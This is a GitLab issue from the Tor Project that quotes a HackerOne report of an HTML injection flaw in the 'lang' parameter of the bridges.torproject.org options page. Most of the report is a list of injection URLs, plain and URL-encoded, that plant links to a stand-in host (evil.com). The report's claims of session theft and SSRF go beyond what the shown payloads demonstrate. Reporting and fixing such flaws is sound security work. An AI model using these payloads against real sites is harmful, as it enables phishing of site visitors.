Skip to content
GitLab
Closed
Created by Cecylia Bocovich@cohoshOwner

HTML injection vulnerability with lang parameter

We just got the following email through the hackerone:

Hlo Sir,

I want to report the vulnerability and possible bypass methods ...i
found on your site https://torproject.org

This vulnerability is much more html injection and possible xss that may
be used by hackers in order to harm others
for phising purpose...

URL: https://bridges.torproject.org/options?lang=anonyks

this is the vulnerable url where i got my vulnerability,
the parameter is lang= (any string) [here is used AnonyKs]
then after payload is used is : "><h1>Giveaway:-P <a
href="//evil.am">CLICK ME</a> </h1>

so the url become:
URL:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="//evil.com">CLICK ME</a> </h1>

copy the url and paste it in the browser
and click on CLICK ME [ there 'click me' is show in three different
places and each redirect to evil.com]

You may fix the upper vulnerability but still there can be other ways
that hacker can use
so...
Now regarding bypass/other possible ways :
URL:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="%2f%2fevil.com">CLICK ME</a> </h1>
URL:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="http://evil.com">CLICK ME</a> </h1>

now econding,

URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22%2f%2fevil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E

There are more ways , now they are without <h1> html tag

URL: https://bridges.torproject.org/options?lang=anonyks"><a
href="http://evil.com">Click Me</a>
URL: https://bridges.torproject.org/options?lang=anonyks"><a
href="//evil.com">Click Me</a>

now again encoding them,

URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E

Impact

Alogethee Today i submitted 10 vulnerability  with possible bypass or
possible method that an attactr can use for crime purpose..
So in sum up all urls are:
Url: https://bridges.torproject.org/options?lang=anonyks"><a
href="//evil.com">Click Me</a>
Url: https://bridges.torproject.org/options?lang=anonyks"><a
href="http://evil.com">Click Me</a>
Url:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="%2f%2fevil.com">CLICK ME</a> </h1>
Url:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="//evil.com">CLICK ME</a> </h1>
Url:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="http://evil.com">CLICK ME</a> </h1>
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22%2f%2fevil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E

Impact:
The vulnerability allow a malicious user to inject html tags and execute
Javascript which could lead to steal user's session, peform CSRF attacks
or open a phishing page.

Broadly,

When the input fields are not properly sanitized over in a webpage, thus
sometimes this HTML Injection vulnerability might lead us to Cross-Site
Scripting(XSS) or Server-Side Request Forgery(SSRF) attacks